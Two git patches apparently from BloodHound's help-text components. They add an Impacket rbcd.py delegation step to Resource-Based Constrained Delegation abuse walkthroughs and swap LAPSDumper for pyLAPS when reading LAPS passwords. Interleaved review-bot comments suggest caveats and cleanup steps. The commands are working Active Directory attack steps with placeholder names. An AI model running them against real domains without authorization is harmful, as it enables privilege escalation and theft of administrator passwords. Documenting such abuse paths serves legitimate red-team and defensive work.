From 4c6d44aa8c02220530eaece97a592d46a69b2f22 Mon Sep 17 00:00:00 2001 From: Shutdown <40902872+ShutdownRepo@users.noreply.github.com> Date: Fri, 20 Jan 2023 17:36:29 +0100 Subject: [PATCH 31/32] Adding missing rbcd.py step for GenericAll, GenericWrite, Owns, WriteDacl, WriteOwner --- .../HelpTexts/GenericAll/LinuxAbuse.jsx | 72 +++++++++---------- .../HelpTexts/GenericWrite/LinuxAbuse.jsx | 36 +++++----- .../Modals/HelpTexts/Owns/LinuxAbuse.jsx | 72 +++++++++---------- .../Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx | 72 +++++++++---------- .../HelpTexts/WriteOwner/LinuxAbuse.jsx | 72 +++++++++---------- 5 files changed, 162 insertions(+), 162 deletions(-) diff --git a/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx index 7b16993c5..20e4c7696 100644 --- a/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx +++ b/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx @@ -177,12 +177,9 @@ const LinuxAbuse = ({

Resource-Based Constrained Delegation

-

- First, if an attacker does not control an account with an - SPN set, a new attacker-controlled computer account can be - added with Impacket's addcomputer.py example script: -

- + First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script:
                             
                                 {
@@ -190,13 +187,19 @@ const LinuxAbuse = ({
                                 }
                             
                         
- -

- We can then get a service ticket for the service name (sname) we - want to "pretend" to be "admin" for. Impacket's getST.py example script - can be used for that purpose. -

- + We now need to configure the target object so that the attacker-controlled + computer can delegate to it. Impacket's rbcd.py script can be used for that + purpose: +
+                            
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            
+                        
+ And finally we can get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose.
                             
                                 {
@@ -204,11 +207,8 @@ const LinuxAbuse = ({
                                 }
                             
                         
- -

- This ticket can then be used with Pass-the-Ticket, and could grant access - to the file system of the TARGETCOMPUTER. -

+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER.

Shadow Credentials attack

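Review bot: The new rbcd.py step authenticates as the placeholder `'domain/user:password'` without saying which principal that must be: writing msDS-AllowedToActOnBehalfOfOtherIdentity on the target requires the account that actually holds this edge over the target, not the freshly created ATTACKERSYSTEM$ account, and readers routinely get this wrong. I would precede the command with a sentence such as `The credentials given to rbcd.py must belong to the principal holding GenericAll over the target; the new computer account only needs to exist and is named in -delegate-from.` The `-delegate-to 'TargetComputer'` placeholder should be the target's sAMAccountName, and since `-delegate-from` is written with a trailing `$` the two placeholders should be styled consistently. The enclosing component starts and ends outside this hunk, so whether a source-name prop is available for interpolation here is inferred from the sibling files, not visible.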
@@ -228,12 +228,9 @@ const LinuxAbuse = ({ <>

Resource-Based Constrained Delegation

-

- First, if an attacker does not control an account with an - SPN set, a new attacker-controlled computer account can be - added with Impacket's addcomputer.py example script: -

- + First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script:
                             
                                 {
@@ -241,13 +238,19 @@ const LinuxAbuse = ({
                                 }
                             
                         
- -

- We can then get a service ticket for the service name (sname) we - want to "pretend" to be "admin" for. Impacket's getST.py example script - can be used for that purpose. -

- + We now need to configure the target object so that the attacker-controlled + computer can delegate to it. Impacket's rbcd.py script can be used for that + purpose: +
+                            
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            
+                        
+ And finally we can get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose.
                             
                                 {
@@ -255,11 +258,8 @@ const LinuxAbuse = ({
                                 }
                             
                         
- -

- This ticket can then be used with Pass-the-Ticket, and could grant access - to the file system of the TARGETCOMPUTER. -

+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER.

Shadow Credentials attack

diff --git a/src/components/Modals/HelpTexts/GenericWrite/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/GenericWrite/LinuxAbuse.jsx index de7650592..25eee7d83 100644 --- a/src/components/Modals/HelpTexts/GenericWrite/LinuxAbuse.jsx +++ b/src/components/Modals/HelpTexts/GenericWrite/LinuxAbuse.jsx @@ -98,12 +98,9 @@ const LinuxAbuse = ({ sourceName, sourceType, targetType }) => { <>

Resource-Based Constrained Delegation

-

- First, if an attacker does not control an account with an - SPN set, a new attacker-controlled computer account can be - added with Impacket's addcomputer.py example script: -

- + First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script:
                         
                             {
@@ -111,13 +108,19 @@ const LinuxAbuse = ({ sourceName, sourceType, targetType }) => {
                             }
                         
                     
- -

- We can then get a service ticket for the service name (sname) we - want to "pretend" to be "admin" for. Impacket's getST.py example script - can be used for that purpose. -

- + We now need to configure the target object so that the attacker-controlled + computer can delegate to it. Impacket's rbcd.py script can be used for that + purpose: +
+                        
+                            {
+                                "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                            }
+                        
+                    
+ And finally we can get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose.
                         
                             {
@@ -125,11 +128,8 @@ const LinuxAbuse = ({ sourceName, sourceType, targetType }) => {
                             }
                         
                     
- -

- This ticket can then be used with Pass-the-Ticket, and could grant access - to the file system of the TARGETCOMPUTER. -

+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER.

Shadow Credentials attack

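Review bot: The RBCD walkthrough added here (addcomputer.py, rbcd.py, getST.py and the prose around them) is the same roughly twenty lines this commit pastes into GenericAll, Owns, WriteDacl and WriteOwner, nine copies in total that differ only in indentation. A single shared component (say `RbcdLinuxAbuse`) or a shared constant holding the three command strings would keep the examples in sync the next time a flag or tool name changes, which is exactly the kind of sweep the neighbouring commits in this series had to do for `secretsdump.py` and `pyLAPS.py`. The placeholders `'ATTACKERSYSTEM$'`, `'TargetComputer'` and `'domain/user:password'` could then be interpolated once; `sourceName` is already in scope per the hunk header. The component's body continues outside the hunk.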
diff --git a/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx
index 31e275352..067cb5c71 100644
--- a/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx
@@ -251,12 +251,9 @@ const LinuxAbuse = ({

Resource-Based Constrained Delegation

-

- First, if an attacker does not control an account with an - SPN set, a new attacker-controlled computer account can be - added with Impacket's addcomputer.py example script: -

- + First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script:
                             
                                 {
@@ -264,13 +261,19 @@ const LinuxAbuse = ({
                                 }
                             
                         
- -

- We can then get a service ticket for the service name (sname) we - want to "pretend" to be "admin" for. Impacket's getST.py example script - can be used for that purpose. -

- + We now need to configure the target object so that the attacker-controlled + computer can delegate to it. Impacket's rbcd.py script can be used for that + purpose: +
+                            
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            
+                        
+ And finally we can get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose.
                             
                                 {
@@ -278,11 +281,8 @@ const LinuxAbuse = ({
                                 }
                             
                         
- -

- This ticket can then be used with Pass-the-Ticket, and could grant access - to the file system of the TARGETCOMPUTER. -

+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER.

Shadow Credentials attack

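Review bot: The rbcd.py `-action 'write'` step modifies msDS-AllowedToActOnBehalfOfOtherIdentity on the target, and nothing in the new text tells the operator to undo it once the service ticket has been obtained. Unless the Opsec tab already covers it, add one sentence after the getST.py step, e.g. `Once done, remove the delegation entry again with rbcd.py (see its -action choices for removing or flushing the attribute) so the target is not left trusting the attacker's computer account.` Leaving that entry in place is both a persistent backdoor on the target and an artefact that defenders look for. The component's body continues outside the hunk.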
@@ -324,12 +324,9 @@ const LinuxAbuse = ({

Resource-Based Constrained Delegation

-

- First, if an attacker does not control an account with an - SPN set, a new attacker-controlled computer account can be - added with Impacket's addcomputer.py example script: -

- + First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script:
                             
                                 {
@@ -337,13 +334,19 @@ const LinuxAbuse = ({
                                 }
                             
                         
- -

- We can then get a service ticket for the service name (sname) we - want to "pretend" to be "admin" for. Impacket's getST.py example script - can be used for that purpose. -

- + We now need to configure the target object so that the attacker-controlled + computer can delegate to it. Impacket's rbcd.py script can be used for that + purpose: +
+                            
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            
+                        
+ And finally we can get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose.
                             
                                 {
@@ -351,11 +354,8 @@ const LinuxAbuse = ({
                                 }
                             
                         
- -

- This ticket can then be used with Pass-the-Ticket, and could grant access - to the file system of the TARGETCOMPUTER. -

+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER.

Shadow Credentials attack

diff --git a/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx
index 9bb171f05..d4b647434 100644
--- a/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx
@@ -251,12 +251,9 @@ const LinuxAbuse = ({

Resource-Based Constrained Delegation

-

- First, if an attacker does not control an account with an - SPN set, a new attacker-controlled computer account can be - added with Impacket's addcomputer.py example script: -

- + First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script:
                             
                                 {
@@ -264,13 +261,19 @@ const LinuxAbuse = ({
                                 }
                             
                         
- -

- We can then get a service ticket for the service name (sname) we - want to "pretend" to be "admin" for. Impacket's getST.py example script - can be used for that purpose. -

- + We now need to configure the target object so that the attacker-controlled + computer can delegate to it. Impacket's rbcd.py script can be used for that + purpose: +
+                            
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            
+                        
+ And finally we can get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose.
                             
                                 {
@@ -278,11 +281,8 @@ const LinuxAbuse = ({
                                 }
                             
                         
- -

- This ticket can then be used with Pass-the-Ticket, and could grant access - to the file system of the TARGETCOMPUTER. -

+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER.

Shadow Credentials attack

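Review bot: The opening step relies on addcomputer.py creating ATTACKERSYSTEM$, but the text never states the precondition: that only works when ms-DS-MachineAccountQuota is above zero for the authenticating user (or the user otherwise has rights to create computer objects), and hardened domains commonly set it to 0. A short caveat after the sentence would save readers a failed step, e.g. `This requires ms-DS-MachineAccountQuota to be greater than 0 (the default is 10) or explicit rights to create computer objects; otherwise use an existing attacker-controlled account that has an SPN as -delegate-from.` It is also worth saying that `'Summer2018!'` is a placeholder to be replaced with a random password, since the created account is a real domain credential that persists until it is cleaned up. The component's body continues outside the hunk.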
@@ -324,12 +324,9 @@ const LinuxAbuse = ({

Resource-Based Constrained Delegation

-

- First, if an attacker does not control an account with an - SPN set, a new attacker-controlled computer account can be - added with Impacket's addcomputer.py example script: -

- + First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script:
                             
                                 {
@@ -337,13 +334,19 @@ const LinuxAbuse = ({
                                 }
                             
                         
- -

- We can then get a service ticket for the service name (sname) we - want to "pretend" to be "admin" for. Impacket's getST.py example script - can be used for that purpose. -

- + We now need to configure the target object so that the attacker-controlled + computer can delegate to it. Impacket's rbcd.py script can be used for that + purpose: +
+                            
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            
+                        
+ And finally we can get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose.
                             
                                 {
@@ -351,11 +354,8 @@ const LinuxAbuse = ({
                                 }
                             
                         
- -

- This ticket can then be used with Pass-the-Ticket, and could grant access - to the file system of the TARGETCOMPUTER. -

+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER.

Shadow Credentials attack

diff --git a/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
index 8045c73db..5fca5cb43 100644
--- a/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
@@ -290,12 +290,9 @@ const LinuxAbuse = ({

Resource-Based Constrained Delegation

-

- First, if an attacker does not control an account with an - SPN set, a new attacker-controlled computer account can be - added with Impacket's addcomputer.py example script: -

- + First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script:
                             
                                 {
@@ -303,13 +300,19 @@ const LinuxAbuse = ({
                                 }
                             
                         
- -

- We can then get a service ticket for the service name (sname) we - want to "pretend" to be "admin" for. Impacket's getST.py example script - can be used for that purpose. -

- + We now need to configure the target object so that the attacker-controlled + computer can delegate to it. Impacket's rbcd.py script can be used for that + purpose: +
+                            
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            
+                        
+ And finally we can get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose.
                             
                                 {
@@ -317,11 +320,8 @@ const LinuxAbuse = ({
                                 }
                             
                         
- -

- This ticket can then be used with Pass-the-Ticket, and could grant access - to the file system of the TARGETCOMPUTER. -

+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER.

Shadow Credentials attack

@@ -376,12 +376,9 @@ const LinuxAbuse = ({

Resource-Based Constrained Delegation

-

- First, if an attacker does not control an account with an - SPN set, a new attacker-controlled computer account can be - added with Impacket's addcomputer.py example script: -

- + First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script:
                             
                                 {
@@ -389,13 +386,19 @@ const LinuxAbuse = ({
                                 }
                             
                         
- -

- We can then get a service ticket for the service name (sname) we - want to "pretend" to be "admin" for. Impacket's getST.py example script - can be used for that purpose. -

- + We now need to configure the target object so that the attacker-controlled + computer can delegate to it. Impacket's rbcd.py script can be used for that + purpose: +
+                            
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            
+                        
+ And finally we can get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose.
                             
                                 {
@@ -403,11 +406,8 @@ const LinuxAbuse = ({
                                 }
                             
                         
- -

- This ticket can then be used with Pass-the-Ticket, and could grant access - to the file system of the TARGETCOMPUTER. -

+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER.

Shadow Credentials attack

From 38abfea34b6e4f08e1a64061e80e032141c804d1 Mon Sep 17 00:00:00 2001 From: Shutdown <40902872+ShutdownRepo@users.noreply.github.com> Date: Fri, 20 Jan 2023 17:44:30 +0100 Subject: [PATCH 32/32] Replacing LAPSDumper with pyLAPS --- .../Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx | 8 ++++---- src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx | 8 ++++---- src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx | 8 ++++---- .../Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx | 4 ++-- src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx | 8 ++++---- src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx | 8 ++++---- 6 files changed, 22 insertions(+), 22 deletions(-) diff --git a/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx index b00ff156a..fb9e0c2ad 100644 --- a/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx +++ b/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx @@ -57,14 +57,14 @@ const LinuxAbuse = ({ sourceName, sourceType, targetName, targetType, haslaps })

- LAPSDumper can be used + pyLAPS can be used to retrieve LAPS passwords:

                             
                                 {
-                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                    'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                                 }
                             
                         
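Review bot: The pyLAPS command retrieves every LAPS password the controlled user can read, but this tab is shown for an edge to one specific computer and the component already receives `targetName` (visible in the hunk header). If pyLAPS can be restricted to a single computer, the example should use that with `targetName` interpolated so the operator reads only the target's ms-Mcs-AdmPwd; if it cannot, a sentence should say that the dump is domain-wide and that the output has to be filtered to the target, since reading more local administrator passwords than the engagement needs is both an opsec and a scope problem. The placeholder `--action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"` also switches to double quotes where the other Linux examples in this series use single quotes; minor, but worth aligning. The component's body continues outside the hunk.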
@@ -110,14 +110,14 @@ const LinuxAbuse = ({ sourceName, sourceType, targetName, targetType, haslaps })

- LAPSDumper can be used + pyLAPS can be used for that purpose:

                         
                             {
-                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                             }
                         
                     
diff --git a/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx index 20e4c7696..7e3d15fb1 100644 --- a/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx +++ b/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx @@ -163,14 +163,14 @@ const LinuxAbuse = ({

- LAPSDumper can be used + pyLAPS can be used to retrieve LAPS passwords:

                             
                                 {
-                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                    'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                                 }
                             
                         
@@ -308,14 +308,14 @@ const LinuxAbuse = ({

- LAPSDumper can be used + pyLAPS can be used for that purpose:

                         
                             {
-                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                             }
                         
                     
diff --git a/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx index 067cb5c71..a1218b7d3 100644 --- a/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx +++ b/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx @@ -237,14 +237,14 @@ const LinuxAbuse = ({

- LAPSDumper can be used + pyLAPS can be used to retrieve LAPS passwords:

                             
                                 {
-                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                    'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                                 }
                             
                         
@@ -428,14 +428,14 @@ const LinuxAbuse = ({

- LAPSDumper can be used + pyLAPS can be used for that purpose:

                         
                             {
-                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                             }
                         
                     
diff --git a/src/components/Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx index aecd018e9..d0174787a 100644 --- a/src/components/Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx +++ b/src/components/Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx @@ -14,14 +14,14 @@ const LinuxAbuse = ({ sourceName, sourceType }) => {

- LAPSDumper can be used + pyLAPS can be used to retrieve LAPS passwords:

                 
                     {
-                        'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                        'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                     }
                 
             
diff --git a/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx index d4b647434..89cf3543b 100644 --- a/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx +++ b/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx @@ -237,14 +237,14 @@ const LinuxAbuse = ({

- LAPSDumper can be used + pyLAPS can be used to retrieve LAPS passwords:

                             
                                 {
-                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                    'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                                 }
                             
                         
@@ -428,14 +428,14 @@ const LinuxAbuse = ({

- LAPSDumper can be used + pyLAPS can be used for that purpose:

                         
                             {
-                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                             }
                         
                     
diff --git a/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
index 5fca5cb43..3505e2eee 100644
--- a/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
@@ -276,14 +276,14 @@ const LinuxAbuse = ({

- LAPSDumper can be used + pyLAPS can be used to retrieve LAPS passwords:

                             
                                 {
-                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                    'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                                 }
                             
                         
@@ -493,14 +493,14 @@ const LinuxAbuse = ({

- LAPSDumper can be used + pyLAPS can be used for that purpose:

                         
                             {
-                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                             }